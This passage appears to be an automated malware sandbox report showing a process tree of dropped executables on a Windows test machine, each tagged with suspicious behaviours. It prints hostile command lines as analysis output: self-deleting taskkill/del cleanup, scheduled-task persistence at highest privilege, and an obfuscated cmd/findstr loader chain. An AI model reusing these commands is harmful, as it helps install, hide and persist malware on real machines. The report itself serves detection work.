C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14856
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14616
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14488
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14796
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8612
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11828
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12964
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:15256
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:15400
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:16048
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:15736
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:15540
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:15500
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9556
-
-
-
C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"2⤵
- Executes dropped EXE
PID:1492 -
C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"3⤵PID:7196
-
-
C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"3⤵PID:7568
-
-
C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"3⤵PID:7192
-
-
C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"3⤵PID:8120
-
-
C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"3⤵PID:7700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 7glI7txA9mjGcEeaSo4MST6J.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe" & del C:\ProgramData\*.dll & exit4⤵PID:7904
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 7glI7txA9mjGcEeaSo4MST6J.exe /f5⤵
- Kills process with taskkill
PID:10820
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:5524
-
-
-
-
-
C:\Users\Admin\Documents\r89nXplmqQE5PqLkZO2pCalF.exe"C:\Users\Admin\Documents\r89nXplmqQE5PqLkZO2pCalF.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1772 -
C:\Users\Admin\AppData\Roaming\4054384.exe"C:\Users\Admin\AppData\Roaming\4054384.exe"3⤵PID:2160
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2160 -s 23204⤵
- Program crash
PID:8872
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2160 -s 23204⤵
- Program crash
PID:9200
-
-
-
C:\Users\Admin\AppData\Roaming\5145572.exe"C:\Users\Admin\AppData\Roaming\5145572.exe"3⤵
- Executes dropped EXE
PID:5084
-
-
C:\Users\Admin\AppData\Roaming\3479057.exe"C:\Users\Admin\AppData\Roaming\3479057.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
C:\Users\Admin\AppData\Roaming\4534878.exe"C:\Users\Admin\AppData\Roaming\4534878.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Users\Admin\AppData\Roaming\8975748.exe"C:\Users\Admin\AppData\Roaming\8975748.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 24524⤵
- Program crash
PID:4576
-
-
-
-
C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe"C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe"2⤵
- Executes dropped EXE
PID:1168 -
C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe"C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe" -u3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1280
-
-
-
C:\Users\Admin\Documents\EL5io2uTzLL3ue6KpQ4V_KCd.exe"C:\Users\Admin\Documents\EL5io2uTzLL3ue6KpQ4V_KCd.exe"2⤵
- Executes dropped EXE
PID:1976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1456
-
-
-
C:\Users\Admin\Documents\ySoHJe_87EJoVpP6wkVVHV_W.exe"C:\Users\Admin\Documents\ySoHJe_87EJoVpP6wkVVHV_W.exe"2⤵
- Executes dropped EXE
PID:2136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 2403⤵
- Program crash
PID:4644
-
-
-
C:\Users\Admin\Documents\9igzZbIMLPjx5gchNZqBLVB2.exe"C:\Users\Admin\Documents\9igzZbIMLPjx5gchNZqBLVB2.exe"2⤵
- Executes dropped EXE
PID:2324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 2363⤵
- Program crash
PID:2848
-
-
-
C:\Users\Admin\Documents\Tz4kBSsK8ii3PudsbF84i4VD.exe"C:\Users\Admin\Documents\Tz4kBSsK8ii3PudsbF84i4VD.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2536 -
C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5100 -
C:\Users\Admin\Documents\UEAOsf8jAmHJ8JCJ9YAOo57Z.exe"C:\Users\Admin\Documents\UEAOsf8jAmHJ8JCJ9YAOo57Z.exe"4⤵
- Executes dropped EXE
PID:5404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 2765⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
-
C:\Users\Admin\Documents\AIIy1ibSgK26QPojGs_p89LL.exe"C:\Users\Admin\Documents\AIIy1ibSgK26QPojGs_p89LL.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2316 -
C:\Users\Admin\AppData\Roaming\5752396.exe"C:\Users\Admin\AppData\Roaming\5752396.exe"5⤵
- Suspicious behavior: SetClipboardViewer
PID:2324
-
-
C:\Users\Admin\AppData\Roaming\2898793.exe"C:\Users\Admin\AppData\Roaming\2898793.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5532 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5532 -s 23046⤵
- Program crash
PID:3472
-
-
-
C:\Users\Admin\AppData\Roaming\2384625.exe"C:\Users\Admin\AppData\Roaming\2384625.exe"5⤵PID:2552
-
-
C:\Users\Admin\AppData\Roaming\7069685.exe"C:\Users\Admin\AppData\Roaming\7069685.exe"5⤵PID:4944
-
-
C:\Users\Admin\AppData\Roaming\1608988.exe"C:\Users\Admin\AppData\Roaming\1608988.exe"5⤵PID:6388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6388 -s 24566⤵
- Program crash
PID:3668
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3300
-
-
-
C:\Users\Admin\Documents\ikQKjhB4k6HEzP8ctwvkUexr.exe"C:\Users\Admin\Documents\ikQKjhB4k6HEzP8ctwvkUexr.exe"2⤵
- Executes dropped EXE
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\is-C36HT.tmp\ikQKjhB4k6HEzP8ctwvkUexr.tmp"C:\Users\Admin\AppData\Local\Temp\is-C36HT.tmp\ikQKjhB4k6HEzP8ctwvkUexr.tmp" /SL5="$102BE,138429,56832,C:\Users\Admin\Documents\ikQKjhB4k6HEzP8ctwvkUexr.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\is-KPQL0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KPQL0.tmp\Setup.exe" /Verysilent4⤵PID:5376
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs75⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3140 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3c2a46f8,0x7ffd3c2a4708,0x7ffd3c2a47186⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:26⤵PID:7024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:5824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:86⤵PID:6356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:16⤵PID:7424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:16⤵PID:7692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:16⤵PID:7916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:16⤵PID:7644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:86⤵PID:7892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:86⤵PID:9360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3580 /prefetch:26⤵PID:9084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:16⤵PID:7680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:16⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:16⤵PID:1472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:16⤵PID:8708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,10044303659547202247,9881957491755674477,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:16⤵PID:10712
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"5⤵PID:4792
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe" -a6⤵PID:6636
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\tmp674_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp674_tmp.exe"6⤵PID:7824
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:8148
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Pei.xll7⤵PID:7628
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:7480
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^HlGEvpOWJOEhLjtMCMDsxiaRDGubGurupaMHjGXUgfrcGybsXUFbdIsmSOwQrdfCLnrzmbAVPJrtrXlnpOAMBGPBqjObFuRXZBJowtRmxKIHEjcVEDHgPDwyIBahIedISyy$" Passa.xll9⤵PID:7744
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
PID:496
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comTra.exe.com o9⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o10⤵PID:3720
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o11⤵PID:11124
-
-
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Users\Admin\AppData\Roaming\6208169.exe"C:\Users\Admin\AppData\Roaming\6208169.exe"6⤵PID:5180
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5180 -s 23087⤵
- Program crash
PID:10440
-
-
-
C:\Users\Admin\AppData\Roaming\5999348.exe"C:\Users\Admin\AppData\Roaming\5999348.exe"6⤵
- Suspicious behavior: SetClipboardViewer
PID:6892
-
-
C:\Users\Admin\AppData\Roaming\4691012.exe"C:\Users\Admin\AppData\Roaming\4691012.exe"6⤵PID:7636
-
-
C:\Users\Admin\AppData\Roaming\4002323.exe"C:\Users\Admin\AppData\Roaming\4002323.exe"6⤵PID:7976
-
-
C:\Users\Admin\AppData\Roaming\7326841.exe"C:\Users\Admin\AppData\Roaming\7326841.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:7688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 22127⤵
- Program crash
PID:6764
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"5⤵
- Loads dropped DLL
PID:5460 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"6⤵PID:9776
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:8468
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"5⤵PID:5348
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent5⤵PID:6228
-
C:\Users\Admin\AppData\Local\Temp\is-SS69T.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-SS69T.tmp\stats.tmp" /SL5="$60134,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent6⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6576 -
C:\Users\Admin\AppData\Local\Temp\is-F1KUN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-F1KUN.tmp\Setup.exe" /Verysilent7⤵
- Suspicious behavior: EnumeratesProcesses
PID:7012 -
C:\Users\Admin\Documents\vWE6HRLRP6La9GsveJvT3ATe.exe"C:\Users\Admin\Documents\vWE6HRLRP6La9GsveJvT3ATe.exe"8⤵PID:6796
-
C:\Users\Admin\Documents\vWE6HRLRP6La9GsveJvT3ATe.exe"C:\Users\Admin\Documents\vWE6HRLRP6La9GsveJvT3ATe.exe"9⤵PID:10764
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im vWE6HRLRP6La9GsveJvT3ATe.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vWE6HRLRP6La9GsveJvT3ATe.exe" & del C:\ProgramData\*.dll & exit10⤵PID:10380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im vWE6HRLRP6La9GsveJvT3ATe.exe /f11⤵
- Kills process with taskkill
PID:7824
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
PID:6056
-
-
-
-
-
C:\Users\Admin\Documents\iSI_MWnl4SFwGAE9W5ckKAM5.exe"C:\Users\Admin\Documents\iSI_MWnl4SFwGAE9W5ckKAM5.exe"8⤵PID:3788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3788 -s 2369⤵
- Program crash
PID:6384
-
-
-
C:\Users\Admin\Documents\bqbWhhjjdJoD3x8AeVGvp07g.exe"C:\Users\Admin\Documents\bqbWhhjjdJoD3x8AeVGvp07g.exe"8⤵PID:8352
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe"C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe"8⤵PID:8316
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7180
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8276
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9544
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9228
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:3452
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:4496
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9984
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6096
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8256
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7116
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:5928
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6704
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2968
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:5980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 2810⤵
- Program crash
PID:10496
-
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10356
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9300
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10912
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10460
